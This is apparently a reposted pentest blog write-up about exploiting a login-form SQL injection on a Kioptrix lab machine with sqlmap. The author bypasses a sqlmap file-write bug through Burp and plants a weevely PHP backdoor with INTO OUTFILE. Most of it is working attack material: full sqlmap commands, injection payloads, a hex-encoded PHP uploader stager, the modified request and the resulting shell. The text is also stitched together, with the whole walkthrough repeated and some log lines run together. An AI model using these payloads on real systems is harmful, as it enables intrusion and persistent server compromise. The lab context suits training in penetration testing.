A newly discovered sqlmap bug in uploading files
程序员文章站
2022-06-28 09:34:33
sqlmap is an open-source SQL injection detection tool written in Python. It supports detecting injection attacks against MySQL, Oracle, SQL Server, PostgreSQL and other databases.
I found this sqlmap bug while idly playing with kioptrix_level_4. My sqlmap version is sqlmap/1.0-dev (r4766), which may be somewhat old.
sqlmap has a bug when uploading custom files; it can be corrected by hand with Burp Suite.
Getting an os-shell with sqlmap
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --os-shell -v 0
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:09:54
[19:09:54] [INFO] using '/pentest/database/sqlmap/output/192.168.84.132/session' as session file
[19:09:54] [INFO] resuming injection data from session file
[19:09:54] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:09:54] [INFO] resuming remote absolute path of temporary files directory 'C:/Users/All Users/Application Data/TEMP' from session file
[19:09:54] [INFO] testing connection to the target url
[19:09:54] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-4299' OR NOT (3643=3643) AND 'Eghx'='Eghx&Submit=Login
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: myusername=admin&mypassword=admin' AND 9530=BENCHMARK(5000000,MD5(0x6e464c57)) AND 'fTHX'='fTHX&Submit=Login
---
[19:09:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[19:09:54] [INFO] going to use a web backdoor for command prompt
[19:09:54] [INFO] fingerprinting the back-end DBMS operating system
[19:09:54] [INFO] the back-end DBMS operating system is Windows
[19:09:54] [INFO] trying to upload the file stager
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] PHP (default)
[4] JSP
> 3
[19:09:57] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: /var/www/
[19:10:01] [INFO] retrieved web server full paths: '/var/www/checklogin.php'
please provide any additional web server full path to try to upload the agent [Enter for None]:
[19:10:03] [INFO] the file stager has been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpujyuo.php
[19:10:03] [WARNING] unable to upload the backdoor through the file stager on '\var\www'
[19:10:03] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] y
[19:10:04] [INFO] the backdoor has probably been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpblegd.php
[19:10:04] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
The key request captured with Burp
POST /checklogin.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 1826
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)
Host: 192.168.84.132
Referer: http://192.168.84.132:80/checklogin.php
Content-Type: application/x-www-form-urlencoded
myusername=admin&mypassword=-1172%27%20OR%202447%3D2447%20LIMIT%201%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Ftmpulehi.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d2929207b0a20202020246469723d245f524551554553545b2275706c6f6164446972225d3b0a0a202020206966202870687076657273696f6e2829203c2027342e312e3027290a202020207b0a20202020202020202466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a20202020656c73650a202020207b0a20202020202020202466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a202020204063686d6f642824646972202e20222f22202e202466696c652c2030373535293b0a202020206563686f202246696c652075706c6f61646564223b0a7d0a656c7365207b0a202020206563686f20223c666f726d20616374696f6e3d22202e20245f5345525645525b225048505f53454c46225d202e2022206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d5c5c7661725c5c7777773e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b0a7d0a3f3e0a%20--%20AND%20%27yJWo%27%3D%27yJWo&Submit=Login
As the request shows, sqlmap writes the file with SELECT ... INTO OUTFILE, passing the file content as a hex literal in the LINES TERMINATED BY clause.
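To see exactly what such a request would write to disk, here is a small decoder. It is an added example, not sqlmap's own code: it URL-decodes the form body, pulls the destination path out of the INTO OUTFILE clause and the hex literal after LINES TERMINATED BY, and returns the decoded file content. The request body it runs on is a constructed sample in which a short placeholder PHP snippet stands in for sqlmap's upload stager; the destination path /var/www/tmpulehi.php is the one from the captured request above. This is the check a defender would run over a proxy capture or access log to learn which path an injected write targets and what it contains.

```python
"""Decode a MySQL INTO OUTFILE write carried in a URL-encoded POST body.

Added example; not sqlmap's own code. Given a form body like the one
captured above, it finds every parameter whose value carries an
INTO OUTFILE / INTO DUMPFILE clause, reads the destination path and,
when the content is passed as a hex literal after LINES TERMINATED BY,
decodes it back to text. A defender reviewing a proxy capture or access
log can then see which file would be written and with what content.
"""
import re
from urllib.parse import parse_qs, quote

# Destination path of the write: INTO OUTFILE '/var/www/x.php'
OUTFILE_RE = re.compile(
    r"INTO\s+(?:OUTFILE|DUMPFILE)\s+'(?P<path>[^']+)'", re.IGNORECASE
)
# File body smuggled as a hex literal: LINES TERMINATED BY 0x3c3f7068...
HEX_RE = re.compile(
    r"LINES\s+TERMINATED\s+BY\s+0x(?P<hex>[0-9a-fA-F]+)", re.IGNORECASE
)


def decode_outfile_write(body):
    """Return a list of (parameter, destination_path, decoded_content)
    tuples, one per parameter that carries an INTO OUTFILE write.
    The list is empty for a benign body."""
    hits = []
    # parse_qs splits on '&' and '=' first, then URL-decodes each value,
    # so %27 / %20 / %3D inside the injected string are restored here.
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            path_match = OUTFILE_RE.search(value)
            if path_match is None:
                continue
            hex_match = HEX_RE.search(value)
            content = ""
            if hex_match is not None:
                # MySQL emits the hex literal as raw bytes after each row;
                # decode it as UTF-8 so the PHP source becomes readable.
                content = bytes.fromhex(hex_match.group("hex")).decode(
                    "utf-8", errors="replace"
                )
            hits.append((name, path_match.group("path"), content))
    return hits


# --- constructed sample input (not the page's real stager) -------------
# A short placeholder PHP file stands in for sqlmap's upload stager; the
# destination path is the one from the captured request above.
SAMPLE_PHP = '<?php echo "constructed sample"; ?>\n'
_INJECTED = (
    "-1172' OR 2447=2447 LIMIT 1 INTO OUTFILE '/var/www/tmpulehi.php' "
    "LINES TERMINATED BY 0x" + SAMPLE_PHP.encode("utf-8").hex()
    + " -- AND 'yJWo'='yJWo"
)
SAMPLE_BODY = "myusername=admin&mypassword=" + quote(_INJECTED) + "&Submit=Login"
BENIGN_BODY = "myusername=admin&mypassword=admin&Submit=Login"


if __name__ == "__main__":
    for param, path, content in decode_outfile_write(SAMPLE_BODY):
        print(f"parameter {param!r} writes {path}:")
        print(content)
    print("benign body hits:", decode_outfile_write(BENIGN_BODY))
```

Running it on the real body from the capture above would print sqlmap's PHP file stager, which is what lands in /var/www as the tmp*.php files listed further down. Because MySQL performs the write, the file is created by the database user, which is why the web server later cannot reuse it as a writable upload point.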
Check the file permissions in the current directory
os-shell> ls -la
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
total 68
drwxr-xr-x 5 root root 4096 Jun 27 15:10 .
drwxr-xr-x 14 root root 4096 Feb 4 09:57 ..
-rw-r--r-- 1 root root 1477 Feb 6 11:31 checklogin.php
-rw-r--r-- 1 root root 298 Feb 4 11:11 database.sql
drwxr-xr-x 2 root root 4096 Feb 6 11:44 images
-rw-r--r-- 1 root root 1255 Feb 6 12:07 index.php
drwxr-xr-x 2 root root 4096 Feb 4 18:33 john
-rw-r--r-- 1 root root 176 Feb 4 12:39 login_success.php
-rw-r--r-- 1 root root 78 Feb 4 11:33 logout.php
-rw-r--r-- 1 root root 606 Feb 6 15:42 member.php
drwxr-xr-x 2 root root 4096 Feb 4 18:30 robert
-rw-rw-rw- 1 root root 927 Jun 27 15:10 tmpblegd.php
-rw-rw-rw- 1 root root 927 Jun 27 15:09 tmpbxngb.php
-rw-rw-rw- 1 root root 927 Jun 27 15:04 tmpbypfb.php
-rw-rw-rw- 1 root root 833 Jun 27 15:09 tmpubbwi.php
-rw-rw-rw- 1 root root 833 Jun 27 15:10 tmpujyuo.php
-rw-rw-rw- 1 root root 833 Jun 27 15:03 tmputbuj.php
---
Given the file permissions above, we cannot use the os-shell file tmpblegd.php generated by sqlmap to upload further custom files. A MySQL/Apache group-permission problem?
Next, let's try uploading an arbitrary file with sqlmap's --file-write/--file-dest options.
My favourite PHP backdoor is weevely, which is similar to Caidao (China Chopper). Generate a backdoor with weevely:
left@Dis9team:~$ sudo weevely generate toor ~/shell.php
[sudo] password for left:
Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012
+ Backdoor file '/home/left/shell.php' created with password 'toor'.
Upload an arbitrary file with sqlmap's --file-write/--file-dest options
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --file-write=/home/left/shell.php --file-dest=/var/www/shell.php -v 0
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:18:34
[19:18:34] [INFO] using '/pentest/database/sqlmap/output/192.168.84.132/session' as session file
[19:18:34] [INFO] resuming injection data from session file
[19:18:34] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:18:34] [INFO] resuming remote absolute path of temporary files directory 'C:/Users/All Users/Application Data/TEMP' from session file
[19:18:34] [INFO] testing connection to the target url
[19:18:35] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-4299' OR NOT (3643=3643) AND 'Eghx'='Eghx&Submit=Login
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: myusername=admin&mypassword=admin' AND 9530=BENCHMARK(5000000,MD5(0x6e464c57)) AND 'fTHX'='fTHX&Submit=Login
---
[19:18:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[19:18:35] [INFO] fingerprinting the back-end DBMS operating system
[19:18:35] [INFO] the back-end DBMS operating system is Windows
[19:18:35] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[19:18:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.84.132'
[*] shutting down at 19:18:35
From the output we can see that sqlmap fingerprints the database server's operating system as Windows (it is actually Ubuntu) and therefore cannot write the file. Let's force --os="Linux" and try the write again.
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --file-write=/home/left/shell.php --file-dest=/var/www/shell.php --os="Linux" -v 0
Look at sqlmap's output
[19:21:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[19:21:15] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[19:21:15] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.84.132'
It reports that the detected SQL injection techniques cannot write files to the system it now takes to be Linux.
Next, we use Burp Suite to modify the request data and upload arbitrary code.
Using Burp Suite's Repeater, intercept the --os-shell request and modify the upload. My modified request is
POST /checklogin.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 1337
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)
Host: 192.168.84.132
Referer: http://192.168.84.132:80/checklogin.php
Content-Type: application/x-www-form-urlencoded
myusername=admin&mypassword=-7451%27%20OR%206811%3D6811%20LIMIT%201%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fcmd.php%27%20LINES%20TERMINATED%20BY%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%20--%20AND%20%27Exci%27%3D%27Exci&Submit=Login
The upload location is set to /var/www/cmd.php and the content of cmd.php is the weevely backdoor generated above. Now let's try connecting to it.
left@Dis9team:~$ weevely http://192.168.84.132/cmd.php toor
Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012
[+] Starting terminal. Shell probe may take a while...
[+] List modules with and show help with :show [module name]
www-data@Kioptrix4:/var/www$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
Author: left@Dis9team http://www.dis9.com/newly-discovered-sqlmap-upload-files-a-bug-2.html
这是我在无聊玩kioptrix_level_4的过程中发现的sqlmap的一个bug,我的sqlmap版本是sqlmap/1.0-dev (r4766),可能有些老了
sqlmap在上传自定义文件上存在bug,可以利用burpsuite来修正
利用sqlmap获取一个os-shell
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --os-shell -v 0
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:09:54
[19:09:54] [INFO] using '/pentest/database/sqlmap/output/192.168.84.132/session' as session file
[19:09:54] [INFO] resuming injection data from session file
[19:09:54] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:09:54] [INFO] resuming remote absolute path of temporary files directory 'C:/Users/All Users/Application Data/TEMP' from session file
[19:09:54] [INFO] testing connection to the target url
[19:09:54] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-4299' OR NOT (3643=3643) AND 'Eghx'='Eghx&Submit=Login
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: myusername=admin&mypassword=admin' AND 9530=BENCHMARK(5000000,MD5(0x6e464c57)) AND 'fTHX'='fTHX&Submit=Login --- [19:09:54] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL 5 [19:09:54] [INFO] going to use a web backdoor for command prompt [19:09:54] [INFO] fingerprinting the back-end DBMS operating system [19:09:54] [INFO] the back-end DBMS operating system is Windows [19:09:54] [INFO] trying to upload the file stager which web application language does the web server support? [1] ASP [2] ASPX [3] PHP (default) [4] JSP > 3
[19:09:57] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: /var/www/
[19:10:01] [INFO] retrieved web server full paths: '/var/www/checklogin.php'
please provide any additional web server full path to try to upload the agent [Enter for None]:
[19:10:03] [INFO] the file stager has been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpujyuo.php
[19:10:03] [WARNING] unable to upload the backdoor through the file stager on '\var\www'
[19:10:03] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] y
[19:10:04] [INFO] the backdoor has probably been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpblegd.php
[19:10:04] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --os-shell -v 0
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:09:54
[19:09:54] [INFO] using '/pentest/database/sqlmap/output/192.168.84.132/session' as session file
[19:09:54] [INFO] resuming injection data from session file
[19:09:54] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:09:54] [INFO] resuming remote absolute path of temporary files directory 'C:/Users/All Users/Application Data/TEMP' from session file
[19:09:54] [INFO] testing connection to the target url
[19:09:54] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-4299' OR NOT (3643=3643) AND 'Eghx'='Eghx&Submit=Login
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: myusername=admin&mypassword=admin' AND 9530=BENCHMARK(5000000,MD5(0x6e464c57)) AND 'fTHX'='fTHX&Submit=Login --- [19:09:54] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu 8.04 (Hardy Heron) web application technology: PHP 5.2.4, Apache 2.2.8 back-end DBMS: MySQL 5 [19:09:54] [INFO] going to use a web backdoor for command prompt [19:09:54] [INFO] fingerprinting the back-end DBMS operating system [19:09:54] [INFO] the back-end DBMS operating system is Windows [19:09:54] [INFO] trying to upload the file stager which web application language does the web server support? [1] ASP [2] ASPX [3] PHP (default) [4] JSP > 3
[19:09:57] [WARNING] unable to retrieve the web server document root
please provide the web server document root [C:/xampp/htdocs/,C:/Inetpub/wwwroot/]: /var/www/
[19:10:01] [INFO] retrieved web server full paths: '/var/www/checklogin.php'
please provide any additional web server full path to try to upload the agent [Enter for None]:
[19:10:03] [INFO] the file stager has been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpujyuo.php
[19:10:03] [WARNING] unable to upload the backdoor through the file stager on '\var\www'
[19:10:03] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n] y
[19:10:04] [INFO] the backdoor has probably been successfully uploaded on '/var/www' - http://192.168.84.132:80/tmpblegd.php
[19:10:04] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>
利用burp抓取的关键数据包
POST /checklogin.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 1826
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)
Host: 192.168.84.132
Referer: http://192.168.84.132:80/checklogin.php
Content-Type: application/x-www-form-urlencoded
myusername=admin&mypassword=-1172%27%20OR%202447%3D2447%20LIMIT%201%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Ftmpulehi.php%27%20LINES%20TERMINATED%20BY%200x3c3f7068700a69662028697373657428245f524551554553545b2275706c6f6164225d2929207b0a20202020246469723d245f524551554553545b2275706c6f6164446972225d3b0a0a202020206966202870687076657273696f6e2829203c2027342e312e3027290a202020207b0a20202020202020202466696c653d24485454505f504f53545f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c652824485454505f504f53545f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a20202020656c73650a202020207b0a20202020202020202466696c653d245f46494c45535b2266696c65225d5b226e616d65225d3b0a2020202020202020406d6f76655f75706c6f616465645f66696c6528245f46494c45535b2266696c65225d5b22746d705f6e616d65225d2c2024646972202e20222f22202e202466696c6529206f722064696528293b0a202020207d0a202020204063686d6f642824646972202e20222f22202e202466696c652c2030373535293b0a202020206563686f202246696c652075706c6f61646564223b0a7d0a656c7365207b0a202020206563686f20223c666f726d20616374696f6e3d22202e20245f5345525645525b225048505f53454c46225d202e2022206d6574686f643d504f535420656e63747970653d6d756c7469706172742f666f726d2d646174613e3c696e70757420747970653d68696464656e206e616d653d4d41585f46494c455f53495a452076616c75653d313030303030303030303e3c623e73716c6d61702066696c652075706c6f616465723c2f623e3c62723e3c696e707574206e616d653d66696c6520747970653d66696c653e3c62723e746f206469726563746f72793a203c696e70757420747970653d74657874206e616d653d75706c6f61644469722076616c75653d5c5c7661725c5c7777773e203c696e70757420747970653d7375626d6974206e616d653d75706c6f61642076616c75653d75706c6f61643e3c2f666f726d3e223b0a7d0a3f3e0a%20--%20AND%20%27yJWo%27%3D%27yJWo&Submit=Login
POST /checklogin.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 1826
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)
Host: 192.168.84.132
Referer: http://192.168.84.132:80/checklogin.php
Content-Type: application/x-www-form-urlencoded
myusername=admin&mypassword=-1172%27%20OR%202447%3D2447%20LIMIT%201%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Ftmpulehi.php%27%20LINES%20TERMINATED%20BY%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%20--%20AND%20%27yJWo%27%3D%27yJWo&Submit=Login
可见sqlmap是利用select into outfile的方法来写文件
查看下当前目录的文件权限
os-shell> ls -la
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
total 68
drwxr-xr-x 5 root root 4096 Jun 27 15:10 .
drwxr-xr-x 14 root root 4096 Feb 4 09:57 ..
-rw-r--r-- 1 root root 1477 Feb 6 11:31 checklogin.php
-rw-r--r-- 1 root root 298 Feb 4 11:11 database.sql
drwxr-xr-x 2 root root 4096 Feb 6 11:44 images
-rw-r--r-- 1 root root 1255 Feb 6 12:07 index.php
drwxr-xr-x 2 root root 4096 Feb 4 18:33 john
-rw-r--r-- 1 root root 176 Feb 4 12:39 login_success.php
-rw-r--r-- 1 root root 78 Feb 4 11:33 logout.php
-rw-r--r-- 1 root root 606 Feb 6 15:42 member.php
drwxr-xr-x 2 root root 4096 Feb 4 18:30 robert
-rw-rw-rw- 1 root root 927 Jun 27 15:10 tmpblegd.php
-rw-rw-rw- 1 root root 927 Jun 27 15:09 tmpbxngb.php
-rw-rw-rw- 1 root root 927 Jun 27 15:04 tmpbypfb.php
-rw-rw-rw- 1 root root 833 Jun 27 15:09 tmpubbwi.php
-rw-rw-rw- 1 root root 833 Jun 27 15:10 tmpujyuo.php
-rw-rw-rw- 1 root root 833 Jun 27 15:03 tmputbuj.php
---
Given the permissions above, we cannot use the os-shell file tmpblegd.php that sqlmap generated to upload a custom file any further. A mysql/apache group-permission issue?
Next we try sqlmap's --file-write/--file-dest options to upload an arbitrary file.
My preferred PHP backdoor is weevely, which is similar to Caidao (菜刀); generate a backdoor with weevely:
left@Dis9team:~$ sudo weevely generate toor ~/shell.php
[sudo] password for left:
Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012
+ Backdoor file '/home/left/shell.php' created with password 'toor'.
Upload the file with sqlmap's --file-write/--file-dest options:
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --file-write=/home/left/shell.php --file-dest=/var/www/shell.php -v 0
sqlmap/1.0-dev (r4766) - automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:18:34
[19:18:34] [INFO] using '/pentest/database/sqlmap/output/192.168.84.132/session' as session file
[19:18:34] [INFO] resuming injection data from session file
[19:18:34] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:18:34] [INFO] resuming remote absolute path of temporary files directory 'C:/Users/All Users/Application Data/TEMP' from session file
[19:18:34] [INFO] testing connection to the target url
[19:18:35] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: myusername=admin&mypassword=-4299' OR NOT (3643=3643) AND 'Eghx'='Eghx&Submit=Login
Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query)
Payload: myusername=admin&mypassword=admin' AND 9530=BENCHMARK(5000000,MD5(0x6e464c57)) AND 'fTHX'='fTHX&Submit=Login
---
[19:18:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[19:18:35] [INFO] fingerprinting the back-end DBMS operating system
[19:18:35] [INFO] the back-end DBMS operating system is Windows
[19:18:35] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[19:18:35] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.84.132'
[*] shutting down at 19:18:35
From the output we can see that sqlmap's fingerprinting decided the database server's operating system is Windows (it is actually Ubuntu), and because of that it cannot write files. Let's force it with --os="Linux" and try writing again:
left@Dis9team:/pentest/database/sqlmap$ sudo python ./sqlmap.py --data="myusername=admin&mypassword=admin&Submit=Login" -u "http://192.168.84.132/checklogin.php" --level=5 --risk=3 --proxy=http://localhost:8080 --file-write=/home/left/shell.php --file-dest=/var/www/shell.php --os="Linux" -v 0
Look at what sqlmap returns:
[19:21:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[19:21:15] [ERROR] none of the SQL injection techniques detected can be used to write files to the underlying file system of the back-end MySQL server
[19:21:15] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.84.132'
It still reports that none of the detected SQL injection techniques can write files to the system, even now that it is identified as Linux.
Next we use Burp Suite to modify the request data and upload arbitrary code.
Using Burp Suite's Repeater, intercept the --os-shell request and modify the upload; my modified request is:
POST /checklogin.php HTTP/1.1
Accept-Encoding: identity
Content-Length: 1337
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: sqlmap/1.0-dev (r4766) (http://www.sqlmap.org)
Host: 192.168.84.132
Referer: http://192.168.84.132:80/checklogin.php
Content-Type: application/x-www-form-urlencoded
myusername=admin&mypassword=-7451%27%20OR%206811%3D6811%20LIMIT%201%20INTO%20OUTFILE%20%27%2Fvar%2Fwww%2Fcmd.php%27%20LINES%20TERMINATED%20BY%200x[hex-encoded file contents elided]%20--%20AND%20%27Exci%27%3D%27Exci&Submit=Login
The upload location is set to /var/www/cmd.php, and the content of cmd.php is the weevely backdoor generated above. Now let's try connecting:
left@Dis9team:~$ weevely http://192.168.84.132/cmd.php toor
Weevely 0.6 - Generate and manage stealth PHP backdoors
Emilio Pinna 2011-2012
[+] Starting terminal. Shell probe may take a while...
[+] List modules with and show help with :show [module name]
www-data@Kioptrix4:/var/www$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
Author: left@Dis9team http://www.dis9.com/newly-discovered-sqlmap-upload-files-a-bug-2.html